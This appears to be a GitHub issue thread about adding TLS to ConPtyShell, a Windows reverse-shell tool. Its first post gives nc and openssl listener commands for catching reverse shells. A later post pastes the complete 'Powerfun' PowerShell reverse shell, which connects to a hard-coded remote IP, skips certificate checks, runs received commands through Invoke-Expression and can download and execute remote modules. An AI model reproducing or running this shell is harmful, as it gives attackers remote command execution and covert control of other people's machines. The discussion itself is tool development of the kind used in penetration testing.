New Feature: Secure Transport

[honze-net]

Would it be possible to use TLS? Instead of stty raw -echo; (stty size; cat) | nc -lvnp 3001 use stty raw -echo; (stty size; cat) | openssl s_server -quiet -key key.pem -cert cert.pem -port 3001 on the other side. (You will have to generate a key and a certificate beforehand with openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes once.)

I am working on a script, that can catch reverse shells from Linux (plaintext and openssl) and upgrade them automatically. I want to extend it to Windows and found this very nice shell. For nc this should be easy for me to adapt. But secure transport would require ConPtyShell to use a TLS connection. Can you implement this?

[antonioCoco]

it would be a nice feature to add as an optional argument.

It should be possible to do with something like in this example https://docs.microsoft.com/en-us/dotnet/api/system.net.security.sslstream?view=netframework-2.0

I will add it in a future release. If you would like to try, PR are welcome :D

[honze-net]

Thank you for your response. I will have a look into it. If I find a way to implement this, I will send a PR. 🙂

[presianbg]

Actually the ncat support --ssl switch, so no need of generating ssl certs beforehand.

Also I have this non-interactive powershell reverse shell stashed from here, which uses encrypted channel:

# Powerfun - Written by Ben Turner & Dave Hardy

function Get-Webclient
{
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun
{
    Param(
    [String]$Command,
    [String]$Sslcon,
    [String]$Download
    )
    Process {
    $modules = @()
    if ($Command -eq "bind")
    {
        $listener = [System.Net.Sockets.TcpListener]4444
        $listener.start()
        $client = $listener.AcceptTcpClient()
    }
    if ($Command -eq "reverse")
    {
        $client = New-Object System.Net.Sockets.TCPClient("192.168.119.126",4444)
    }

    $stream = $client.GetStream()

    if ($Sslcon -eq "true")
    {
        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
        $sslStream.AuthenticateAsClient("192.168.119.126", $null, "Tls12", $false)
        $stream = $sslStream
    }

    [byte[]]$bytes = 0..20000|%{0}
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    if ($Download -eq "true")
    {
        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        ForEach ($module in $modules)
        {
            (Get-Webclient).DownloadString($module)|Invoke-Expression
        }
    }

    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()
    }
    $client.Close()
    $listener.Stop()
    }
}

The question is if this approach could be implemented with interactive shell ?!